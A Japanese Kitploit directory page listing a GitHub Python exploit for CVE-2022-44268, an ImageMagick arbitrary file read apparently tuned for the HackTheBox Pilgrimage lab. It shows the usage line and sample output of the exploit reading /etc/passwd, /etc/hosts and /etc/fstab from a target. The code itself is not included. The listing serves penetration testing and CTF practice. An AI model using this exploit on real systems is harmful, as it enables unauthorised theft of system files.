Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/jkobierczynski/cve-2022-44268
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集CTFペネトレーションテスト
GitHubjkobierczynski/cve-2022-44268

cve-2022-44268

自動化されたPythonエクスプロイト for CVE-2022-44268(ImageMagickの任意ファイル読み取り)。細工されたPNGをアップロードし、返された画像からファイル内容を抽出し、結果をローカルに保存します。

リポジトリを見る
341年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

HackTheBox Pilgrimage 向けに調整されたエクスプロイト

cve-2022-44268 を使用して、入力ファイル内のプロファイル値に入力ファイルリストからのファイル名を追加し、Burpsuite(既に含まれている)からの入力 request.req ファイルを使用して画像ファイルアップロードを更新し、各変更された画像をアップロードし、返された URL から返された画像をダウンロードしてファイルコンテンツを抽出し、それを入力ディレクトリに配置する自動 Python スクリプト。

root@kitploit:~
$ ./cve-2022-44268.py                                                                 
usage: cve-2022-44268.py [-h] base_png filelist request_req output_dir image_output_dir
cve-2022-44268.py: error: the following arguments are required: base_png, filelist, request_req, output_dir, image_output_dir

$ ./cve-2022-44268.py image.png filelist.lst request.req output_dir image_output_dir
Exploiting for file: /etc/passwd
Saved shrunk image to: image_output_dir/etc_passwd_shrunk.png
Saved extracted content to: output_dir/etc_passwd
Exploiting for file: /etc/hosts
Saved shrunk image to: image_output_dir/etc_hosts_shrunk.png
Saved extracted content to: output_dir/etc_hosts
Exploiting for file: /etc/fstab
Saved shrunk image to: image_output_dir/etc_fstab_shrunk.png
Saved extracted content to: output_dir/etc_fstab
ツールをダウンロード